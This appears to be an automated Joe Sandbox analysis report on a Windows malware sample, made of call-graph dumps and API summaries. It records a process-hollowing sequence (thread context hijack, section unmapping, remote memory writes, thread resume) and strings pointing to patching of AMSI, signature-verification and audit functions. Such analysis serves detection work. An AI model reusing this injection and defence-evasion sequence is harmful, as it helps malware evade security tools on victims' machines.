GetProcAddress 30392->30393 30394 2c48142 30393->30394 30417 2c344d0 30394->30417 30398 2c34500 11 API calls 30397->30398 30399 2c47d25 30398->30399 30400 2c47914 12 API calls 30399->30400 30401 2c47d32 30400->30401 30402 2c34798 11 API calls 30401->30402 30403 2c47d42 30402->30403 30422 2c48020 30403->30422 30406 2c480c8 15 API calls 30407 2c47d5b NtWriteVirtualMemory 30406->30407 30408 2c47d87 30407->30408 30409 2c344d0 11 API calls 30408->30409 30410 2c47d94 FreeLibrary 30409->30410 30410->27332 30412 2c47925 30411->30412 30413 2c34b78 11 API calls 30412->30413 30415 2c47935 30413->30415 30414 2c479a1 30414->30391 30415->30414 30421 2c3ba44 CharNextA 30415->30421 30419 2c344d6 30417->30419 30418 2c344fc 30418->30350 30419->30418 30420 2c32c2c 11 API calls 30419->30420 30420->30419 30421->30415 30423 2c34500 11 API calls 30422->30423 30424 2c48043 30423->30424 30425 2c47914 12 API calls 30424->30425 30426 2c48050 30425->30426 30427 2c48058 GetModuleHandleA 30426->30427 30428 2c480c8 15 API calls 30427->30428 30429 2c48069 GetModuleHandleA 30428->30429 30430 2c48087 30429->30430 30431 2c344ac 11 API calls 30430->30431 30432 2c47d55 30431->30432 30432->30406 30433 2c5c2fc 30443 2c36518 30433->30443 30437 2c5c32a 30448 2c5bb50 timeSetEvent 30437->30448 30439 2c5c334 30440 2c5c342 GetMessageA 30439->30440 30441 2c5c336 TranslateMessage DispatchMessageA 30440->30441 30442 2c5c352 30440->30442 30441->30440 30444 2c36523 30443->30444 30449 2c34168 30444->30449 30447 2c3427c SysAllocStringLen SysFreeString SysReAllocStringLen 30447->30437 30448->30439 30450 2c341ae 30449->30450 30451 2c34227 30450->30451 30452 2c343b8 30450->30452 30463 2c34100 30451->30463 30454 2c343fa 30452->30454 30455 2c343e9 30452->30455 30459 2c3443f FreeLibrary 30454->30459 30460 2c34463 30454->30460 30468 2c3432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 30455->30468 30458 2c343f3 30458->30454 30459->30454 30461 2c34472 ExitProcess 30460->30461 30462 2c3446c 30460->30462 30462->30461 30464 2c34143 30463->30464 30465 2c34110 30463->30465 30464->30447 30465->30464 30469 2c35814 30465->30469 30473 2c315cc 30465->30473 30468->30458 30470 2c35824 GetModuleFileNameA 30469->30470 30471 2c35840 30469->30471 30477 2c35a78 GetModuleFileNameA RegOpenKeyExA 30470->30477 30471->30465 30496 2c31560 30473->30496 30475 2c315d4 VirtualAlloc 30476 2c315eb 30475->30476 30476->30465 30478 2c35afb 30477->30478 30479 2c35abb RegOpenKeyExA 30477->30479 30495 2c358b4 12 API calls 30478->30495 30479->30478 30481 2c35ad9 RegOpenKeyExA 30479->30481 30481->30478 30483 2c35b84 lstrcpynA GetThreadLocale GetLocaleInfoA 30481->30483 30482 2c35b20 RegQueryValueExA 30484 2c35b5e RegCloseKey 30482->30484 30485 2c35b40 RegQueryValueExA 30482->30485 30486 2c35bbb 30483->30486 30487 2c35c9e 30483->30487 30484->30471 30485->30484 30486->30487 30489 2c35bcb lstrlenA 30486->30489 30487->30471 30490 2c35be3 30489->30490 30490->30487 30491 2c35c30 30490->30491 30492 2c35c08 lstrcpynA LoadLibraryExA 30490->30492 30491->30487 30493 2c35c3a lstrcpynA LoadLibraryExA 30491->30493 30492->30491 30493->30487 30494 2c35c6c lstrcpynA LoadLibraryExA 30493->30494 30494->30487 30495->30482 30497 2c31500 30496->30497 30497->30475 30498 2c34e88 30499 2c34e95 30498->30499 30503 2c34e9c 30498->30503 30507 2c34bdc SysAllocStringLen 30499->30507 30504 2c34bfc 30503->30504 30505 2c34c02 SysFreeString 30504->30505 30506 2c34c08 30504->30506 30505->30506 30507->30503 30508 2c31c6c 30509 2c31d04 30508->30509 30510 2c31c7c 30508->30510 30513 2c31f58 30509->30513 30514 2c31d0d 30509->30514 30511 2c31cc0 30510->30511 30512 2c31c89 30510->30512 30515 2c31724 10 API calls 30511->30515 30516 2c31c94 30512->30516 30556 2c31724 30512->30556 30517 2c31fec 30513->30517 30520 2c31f68 30513->30520 30521 2c31fac 30513->30521 30518 2c31d25 30514->30518 30532 2c31e24 30514->30532 30537 2c31cd7 30515->30537 30523 2c31d2c 30518->30523 30524 2c31d48 30518->30524 30529 2c31dfc 30518->30529 30527 2c31724 10 API calls 30520->30527 30526 2c31fb2 30521->30526 30530 2c31724 10 API calls 30521->30530 30522 2c31e7c 30528 2c31724 10 API calls 30522->30528 30545 2c31e95 30522->30545 30536 2c31d79 Sleep 30524->30536 30548 2c31d9c 30524->30548 30525 2c31cfd 30544 2c31f82 30527->30544 30541 2c31f2c 30528->30541 30533 2c31724 10 API calls 30529->30533 30547 2c31fc1 30530->30547 30531 2c31cb9 30532->30522 30535 2c31e55 Sleep 30532->30535 30532->30545 30550 2c31e05 30533->30550 30534 2c31fa7 30535->30522 30538 2c31e6f Sleep 30535->30538 30539 2c31d91 Sleep 30536->30539 30536->30548 30537->30525 30543 2c31a8c 8 API calls 30537->30543 30538->30532 30539->30524 30540 2c31ca1 30540->30531 30580 2c31a8c 30540->30580 30541->30545 30549 2c31a8c 8 API calls 30541->30549 30542 2c31e1d 30543->30525 30544->30534 30551 2c31a8c 8 API calls 30544->30551 30547->30534 30554 2c31a8c 8 API calls 30547->30554 30552 2c31f50 30549->30552 30550->30542 30553 2c31a8c 8 API calls 30550->30553 30551->30534 30553->30542 30555 2c31fe4 30554->30555 30557 2c31968 30556->30557 30558 2c3173c 30556->30558 30559 2c31938 30557->30559 30560 2c31a80 30557->30560 30567 2c3174e 30558->30567 30570 2c317cb Sleep 30558->30570 30564 2c31947 Sleep 30559->30564 30574 2c31986 30559->30574 30562 2c31684 VirtualAlloc 30560->30562 30563 2c31a89 30560->30563 30561 2c3175d 30561->30540 30565 2c316bf 30562->30565 30566 2c316af 30562->30566 30563->30540 30568 2c3195d Sleep 30564->30568 30564->30574 30565->30540 30597 2c31644 30566->30597 30567->30561 30571 2c3180a Sleep 30567->30571 30577 2c3182c 30567->30577 30568->30559 30570->30567 30572 2c317e4 Sleep 30570->30572 30576 2c31820 Sleep 30571->30576 30571->30577 30572->30558 30573 2c319a4 30573->30540 30574->30573 30575 2c315cc VirtualAlloc 30574->30575 30575->30573 30576->30567 30578 2c315cc VirtualAlloc 30577->30578 30579 2c31838 30577->30579 30578->30579 30579->30540 30581 2c31aa1 30580->30581 30582 2c31b6c 30580->30582 30584 2c31aa7 30581->30584 30587 2c31b13 Sleep 30581->30587 30583 2c316e8 30582->30583 30582->30584 30586 2c31c66 30583->30586 30588 2c31644 2 API calls 30583->30588 30585 2c31ab0 30584->30585 30590 2c31b4b Sleep 30584->30590 30593 2c31b81 30584->30593 30585->30531 30586->30531 30587->30584 30589 2c31b2d Sleep 30587->30589 30591 2c316f5 VirtualFree 30588->30591 30589->30581 30592 2c31b61 Sleep 30590->30592 30590->30593 30594 2c3170d 30591->30594 30592->30584 30595 2c31c00 VirtualFree 30593->30595 30596 2c31ba4 30593->30596 30594->30531 30595->30531 30596->30531 30598 2c31681 30597->30598 30599 2c3164d 30597->30599 30598->30565 30599->30598 30600 2c3164f Sleep 30599->30600 30601 2c31664 30600->30601 30601->30598 30602 2c31668 Sleep 30601->30602 30602->30599

                                                                                                                                      Executed Functions

                                                                                                                                      Function 02C48BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 6797 2c48bb0-2c48bb3 6798 2c48bb8-2c48bbd 6797->6798 6798->6798 6799 2c48bbf-2c48ca6 call 2c3493c call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 6798->6799 6830 2c4a6f7-2c4a761 call 2c344d0 * 2 call 2c34c0c call 2c344d0 call 2c344ac call 2c344d0 * 2 6799->6830 6831 2c48cac-2c48d87 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 6799->6831 6831->6830 6875 2c48d8d-2c490b5 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c330d4 * 2 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34d8c call 2c34d9c call 2c485dc 6831->6875 6984 2c490b7-2c49123 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 6875->6984 6985 2c49128-2c49449 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c32ee0 call 2c32f08 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 GetThreadContext 6875->6985 6984->6985 6985->6830 7093 2c4944f-2c496b2 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c48254 6985->7093 7166 2c499bf-2c49a2a call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 7093->7166 7167 2c496b8-2c49821 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c484c4 7093->7167 7192 2c49a30-2c49bb0 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c479b4 7166->7192 7193 2c49a2b call 2c48824 7166->7193 7257 2c49823-2c49849 call 2c479b4 7167->7257 7258 2c4984b-2c498b6 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 7167->7258 7192->6830 7298 2c49bb6-2c49caf call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c48ac0 7192->7298 7193->7192 7266 2c498bc-2c499b3 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c479b4 7257->7266 7258->7266 7297 2c498b7 call 2c48824 7258->7297 7337 2c499b8-2c499bd 7266->7337 7297->7266 7349 2c49cb1-2c49cfe call 2c489b8 call 2c489ac 7298->7349 7350 2c49d03-2c4a45b call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c47d00 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c47d00 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 SetThreadContext NtResumeThread call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c32c2c call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c487a0 * 3 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 7298->7350 7337->7192 7349->7350 7575 2c4a460-2c4a6f2 call 2c487a0 * 2 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 * 5 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c47ed4 call 2c487a0 * 2 7350->7575 7575->6830
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
                                                                                                                                        • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
                                                                                                                                        • Part of subcall function 02C485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C48668
                                                                                                                                      • GetThreadContext.KERNEL32(00000884,02C91420,ScanString,02C913A4,02C4A77C,UacInitialize,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,UacInitialize,02C913A4), ref: 02C49442
                                                                                                                                        • Part of subcall function 02C48254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C482C5
                                                                                                                                        • Part of subcall function 02C484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02C48529
                                                                                                                                        • Part of subcall function 02C479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
                                                                                                                                        • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
                                                                                                                                      • SetThreadContext.KERNEL32(00000884,02C91420,ScanBuffer,02C913A4,02C4A77C,ScanString,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,00000868,002FAFF8,02C914F8,00000004,02C914FC), ref: 02C4A157
                                                                                                                                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,00000884,02C91420,ScanBuffer,02C913A4,02C4A77C,ScanString,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,00000868,002FAFF8,02C914F8), ref: 02C4A164
                                                                                                                                        • Part of subcall function 02C487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
                                                                                                                                        • Part of subcall function 02C487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
                                                                                                                                        • Part of subcall function 02C487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                      • API String ID: 1022112746-51457883
                                                                                                                                      • Opcode ID: 81b23c65aea8020546dbc4a94c6b097426b7f6d40694db4bfb084e6308ae4020
                                                                                                                                      • Instruction ID: 6030126a2874176fbc06cf04b8ae37fc07095c389c27cb2845dfaef2a4cddd0d
                                                                                                                                      • Opcode Fuzzy Hash: 81b23c65aea8020546dbc4a94c6b097426b7f6d40694db4bfb084e6308ae4020
                                                                                                                                      • Instruction Fuzzy Hash: 28E20B75A901189FDB26EB64CCA0FDF77BAAF89310F1049A1E009AB314DE30AE45DF51
                                                                                                                                      Function 02C48BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 7653 2c48bae-2c48bb3 7655 2c48bb8-2c48bbd 7653->7655 7655->7655 7656 2c48bbf-2c48ca6 call 2c3493c call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 7655->7656 7687 2c4a6f7-2c4a761 call 2c344d0 * 2 call 2c34c0c call 2c344d0 call 2c344ac call 2c344d0 * 2 7656->7687 7688 2c48cac-2c48d87 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 7656->7688 7688->7687 7732 2c48d8d-2c490b5 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c330d4 * 2 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34d8c call 2c34d9c call 2c485dc 7688->7732 7841 2c490b7-2c49123 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 7732->7841 7842 2c49128-2c49449 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c32ee0 call 2c32f08 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 GetThreadContext 7732->7842 7841->7842 7842->7687 7950 2c4944f-2c496b2 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c48254 7842->7950 8023 2c499bf-2c49a2a call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 7950->8023 8024 2c496b8-2c49821 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c484c4 7950->8024 8049 2c49a30-2c49bb0 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c479b4 8023->8049 8050 2c49a2b call 2c48824 8023->8050 8114 2c49823-2c49849 call 2c479b4 8024->8114 8115 2c4984b-2c498b6 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 8024->8115 8049->7687 8155 2c49bb6-2c49caf call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c48ac0 8049->8155 8050->8049 8123 2c498bc-2c499bd call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c479b4 8114->8123 8115->8123 8154 2c498b7 call 2c48824 8115->8154 8123->8049 8154->8123 8206 2c49cb1-2c49cfe call 2c489b8 call 2c489ac 8155->8206 8207 2c49d03-2c4a6f2 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c47d00 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c47d00 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 SetThreadContext NtResumeThread call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c32c2c call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c487a0 * 3 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c487a0 * 2 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 * 5 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c47ed4 call 2c487a0 * 2 8155->8207 8206->8207 8207->7687
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
                                                                                                                                        • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
                                                                                                                                        • Part of subcall function 02C485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C48668
                                                                                                                                      • GetThreadContext.KERNEL32(00000884,02C91420,ScanString,02C913A4,02C4A77C,UacInitialize,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,UacInitialize,02C913A4), ref: 02C49442
                                                                                                                                        • Part of subcall function 02C48254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C482C5
                                                                                                                                        • Part of subcall function 02C484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02C48529
                                                                                                                                        • Part of subcall function 02C479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                      • API String ID: 4113022151-51457883
